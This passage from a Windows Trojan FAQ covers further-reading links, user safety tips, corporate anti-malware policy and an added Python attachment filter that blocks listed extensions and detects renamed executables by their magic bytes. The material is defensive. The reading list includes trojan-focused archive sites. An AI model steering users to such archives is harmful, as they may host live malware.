http://www.frame4.com/content/files/what_trojan.pdf




15. Are there any recommended resources regarding further information on the topic?


Windows Trojans pose a significant threat to the security of your computer; hence the Internet is filled with sites that discuss the topic. Follow the links below:



http://www.megasecurity.org/

http://www.trojan.ch/

http://www.trojanforge.net/

http://packetstormsecurity.org/trojans

http://www.pcflank.com/

Packages Review Web Sites:



http://www.anti-trojan-software-reviews.com/

http://www.staff.uiuc.edu/~ehowes/trojans/tr-tests.htm

http://www.wilders.org/anti_trojans.htm

http://www.firewallguide.com/anti-trojan.htm
 
16. Can you provide me with tips in order to protect myself, as well as prevent possible infections?



Here is a summary of the whole FAQ. These tips show how to behave in a secure manner, and they could be a lifesaver as far as Windows Trojan threats are concerned.



Never accept a file just because it comes from a friend. You are never absolutely sure who is on the other side of the computer at any given moment. If you really need the file, say a presentation or a work paper, verify by other means, such as by telephone, that the file is indeed from your friend. It will take some time and slow you down a bit, but being paranoid about the attachments you receive means you will not get infected this way.

When executing files, first check their real type. Is it really a .doc, or is it an executable with a .doc icon? Windows hides known extensions by default, so "report.doc.exe" is displayed as "report.doc"; turn that option off in the folder options and look at the full name.

Update your Anti-Virus and Anti-Trojan signature files regularly, if possible EVERY day, as new trojans and viruses are discovered every day. Most detection software can schedule scans, so if you leave your machine switched on overnight, consider scheduling a scan and an update every night.

Make sure you always have the latest version of the software you use, as new bugs appear very often and programs are updated regularly. Check often whether bugs or other problems have been found in the software that may put your system at risk, and patch/update your system(s) accordingly. Some software can check the vendor's web site for the latest version; make use of it.

Take several minutes regularly to check the processes on your machine with the software reviewed above. You will be surprised at what you may detect sometimes.

It is vital to understand the risk of accepting software from someone you have just met, or from someone you have only had a few ICQ or IRC conversations with.

Consider freeware programs from unknown sources as risky downloads, and search for reviews of a program before running it.

Carefully read the help files that come with your detection software in order to be able to use them to their full capacity.

Download software ONLY from its official page(s) or a dedicated mirror site. Never get the latest version of mIRC, ICQ or any other program from a site you have never heard of, such as a free web space provider like Geocities. Consider such a site untrusted and do NOT download anything from it.

If you are playing with trojans you can also get infected, as there are trojan builders and other tools that are themselves infected, waiting for someone with little knowledge of the topic to download and use them.

Don't be naive about everything you see on the Internet or about what various sites offer you; don't download any software you have never heard of.


17. How should we deal with potential malware problems in our company?


Security Policy



First of all you should establish an Anti-Malware Policy, guiding staff members on the process of protecting critical company data from destruction or exposure. It needs to state their responsibilities clearly while using any of the company's information resources, so that it is easily understood and properly implemented later. Define what is allowed and what is not, what they should and should not do in order to keep their workstations, as well as the company's network, free of malware. Keep it short, precise and easy to understand; know your audience before you start building it, and measure their computer/security skill level for maximal effectiveness.



Gateway Protection



You might consider using Gateway Protection, which detects and blocks malware at the server level before it reaches the workstations. A few reasonable products for this are:



Symantec AntiVirus Gateway Solution

Symantec AntiVirus for SMTP Gateways

Symantec Anti-Virus Corporate Edition

GFI MailSecurity

GFI DownloadSecurity



Content Blocking



Another valuable strategy in the company's effort to protect its critical data from malware is to filter, at the server level, file extensions known to be dangerous and potentially destructive. These include: .exe, .com, .vbs, .scr, .asd, .asf, .asx, .bas, .bat, .chm, .cmd, .dll, .hlp, .hta, .hto, .js, .jse, .link, .lnk, .pif, .reg, .vb, .vbe, .wsf, .wsh and .wsc. Match the extension case-insensitively and on the last part of the name, since "report.doc.exe" is still an executable, and remember that extension filtering alone is easily bypassed by renaming the file or wrapping it in an archive, so it complements scanning rather than replacing it.



Whenever someone in the company needs to receive an attachment with one of these extensions, the recipient can ask the sender to change the file's extension; that way the recipient also confirms that a known person has sent the attachment. Note that this is exactly the step an extension-only filter cannot see through, so the renamed file should still be scanned before it is renamed back and opened.
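An attachment filter that implements the block list above and also checks what the file actually is, so that the "is it really a .doc?" question from the tips and the renamed-attachment workaround are both covered, as an added example that is not part of the original paper. BLOCKED_EXTENSIONS is the list from the section above; the magic numbers, the extra "quarantine" verdict for archives (which the paper does not discuss) and the sample attachments in demo() are my own additions.

```python
"""Attachment filter that blocks by extension AND by content, so that an executable renamed
to .doc (or renamed on request, as the workaround above suggests) is still caught.
Added example, not from the original paper: BLOCKED_EXTENSIONS is the list from the section
above; the magic numbers, the 'quarantine' verdict and the sample attachments are my own."""

BLOCKED_EXTENSIONS = {
    "exe", "com", "vbs", "scr", "asd", "asf", "asx", "bas", "bat", "chm", "cmd", "dll",
    "hlp", "hta", "hto", "js", "jse", "link", "lnk", "pif", "reg", "vb", "vbe", "wsf",
    "wsh", "wsc",
}

# Leading bytes of a few well-known formats (standard values, assumed for this example).
MAGIC = [
    (b"MZ", "pe-executable"),                              # .exe/.dll/.scr and PE .com files
    (b"PK\x03\x04", "zip-archive"),
    (bytes.fromhex("D0CF11E0A1B11AE1"), "ole-document"),   # legacy .doc/.xls
    (b"%PDF-", "pdf"),
]


def effective_extension(filename):
    """The extension Windows will actually act on: the part after the LAST dot, lower-cased,
    after stripping trailing dots and spaces, which the Win32 file API silently discards
    ("invoice.exe " and "invoice.exe." both land on disk as invoice.exe)."""
    name = filename.strip().rstrip(". ")
    if "." not in name:
        return ""
    return name.rsplit(".", 1)[1].strip().lower()


def sniff_type(data):
    """Classify the content by its leading bytes, ignoring whatever the name claims."""
    for magic, kind in MAGIC:
        if data[:len(magic)] == magic:
            return kind
    return "unknown"


def assess(filename, data):
    """Return (verdict, reason); verdict is 'block', 'quarantine' or 'allow'."""
    ext = effective_extension(filename)
    kind = sniff_type(data)
    if ext in BLOCKED_EXTENSIONS:
        return "block", f"extension .{ext} is on the block list"
    if kind == "pe-executable":
        # A renamed executable: an extension-only filter would let this through.
        return "block", f"content is a Windows executable although it is named .{ext or '(none)'}"
    if kind == "zip-archive":
        return "quarantine", "archive may wrap a blocked file; unpack and re-check the contents"
    return "allow", f"{kind} content with extension .{ext or '(none)'}"


def demo():
    """Constructed sample attachments (name, first bytes) -> (verdict, reason)."""
    ole = bytes.fromhex("D0CF11E0A1B11AE1") + b"\x00" * 8
    samples = [
        ("quarterly.doc", ole),                        # genuine legacy Word file
        ("invoice.doc.exe", b"MZ\x90\x00\x03"),        # double extension, real .exe
        ("report.doc", b"MZ\x90\x00\x03"),             # executable renamed to .doc
        ("photo.jpg.", b"MZ\x90\x00\x03"),             # trailing dot, wrong name, real .exe
        ("script.VBS ", b"MsgBox \"hi\"\r\n"),          # upper-case ext, trailing space
        ("tools.zip", b"PK\x03\x04\x14\x00"),          # archive: look inside
        ("notes.txt", b"meeting at 10\r\n"),           # harmless
    ]
    return {name: assess(name, data) for name, data in samples}


if __name__ == "__main__":
    for name, (verdict, reason) in demo().items():
        print(f"{verdict:10} {name!r}: {reason}")
```

The content check is what catches "report.doc" carrying an MZ header, the case the extension list alone misses; conversely "script.VBS " is caught by the extension rule even though a script has no fixed magic bytes, which is why both rules are needed. Archives are only quarantined here because deciding about them requires unpacking and running the same checks on each member.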


18. How should we deal with the dangers of Free E-mail providers, as far as protecting against Malware is concerned?


In your Anti-Malware Policy you need to state whether the use of free e-mail providers is allowed or strictly prohibited. If it is allowed, educate staff about the problem of potentially destructive attachments downloaded from their external e-mail and run on the company's network. If it is prohibited by the security policy, block access to these services and let staff members know that proper use of the e-mail system is strictly monitored.
